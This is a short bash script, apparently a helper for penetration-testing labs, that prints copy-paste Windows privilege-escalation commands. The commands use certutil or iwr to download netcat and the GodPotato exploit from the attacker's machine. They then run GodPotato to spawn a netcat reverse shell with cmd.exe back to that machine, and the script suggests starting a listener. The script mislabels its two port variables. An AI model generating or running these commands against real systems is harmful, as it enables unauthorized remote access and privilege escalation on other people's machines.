#!/bin/bash

TOOLS_PORT=31337

# Colors
GREEN='\033[0;32m' # Green
NC='\033[0m'       # No Color


# Make this work for local lab also
if ip -4 a show tun0 &> /dev/null; then
    LHOST=$(ip -4 a show tun0 | grep -Po 'inet \K[\d.]+')
else
    LHOST=$(ip -4 a show wlan0 | grep -Po 'inet \K[\d.]+')
fi


if [ $# -eq 0 ]
then
  LPORT=443
else
  LPORT=$1
fi

cat << "EOF"
 __          _______ _   _            _                     
 \ \        / /_   _| \ | |          (_)                    
  \ \  /\  / /  | | |  \| |_ __  _ __ ___   _____  ___  ___ 
   \ \/  \/ /   | | | . ` | '_ \| '__| \ \ / / _ \/ __|/ __|
    \  /\  /   _| |_| |\  | |_) | |  | |\ V /  __/\__ \ (__ 
     \/  \/   |_____|_| \_| .__/|_|  |_| \_/ \___||___/\___|
                          | |                               
                          |_|                                                                                                 
EOF

# Automate LPE tool setup i.e PoTaToeessss

# https://patorjk.com/software/taag/#p=display&f=Big&t=WINprivesc

echo -e "LHOST=${GREEN}$LHOST${NC}"
echo -e "LPORT=${GREEN}$TOOLS_PORT${NC}"
echo -e "TOOLS_PORT=${GREEN}$LPORT${NC}"


echo ""

echo
echo '********** Windows **********'
echo
echo "=== GodPotato ==="
echo
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/nc64.exe C:\Windows\Temp\nc.exe"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/exploits/GodPotato-NET4.exe C:\Windows\Temp\GodPotato.exe"
echo "C:\Windows\Temp\GodPotato.exe -cmd \"C:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $LHOST $LPORT\""
echo
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/nc64.exe -Outfile C:\Windows\Temp\nc.exe"
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/exploits/GodPotato-NET4.exe -Outfile C:\Windows\Temp\GodPotato.exe"
echo "C:\Windows\Temp\GodPotato.exe -cmd \"C:\Windows\Temp\nc.exe -t -e C:\Windows\System32\cmd.exe $LHOST $LPORT\""
echo
echo
echo "=== Some other potato.. ==="

echo '********** Linux **********'
echo "Set up listener e.g nc -nlvp $LPORT"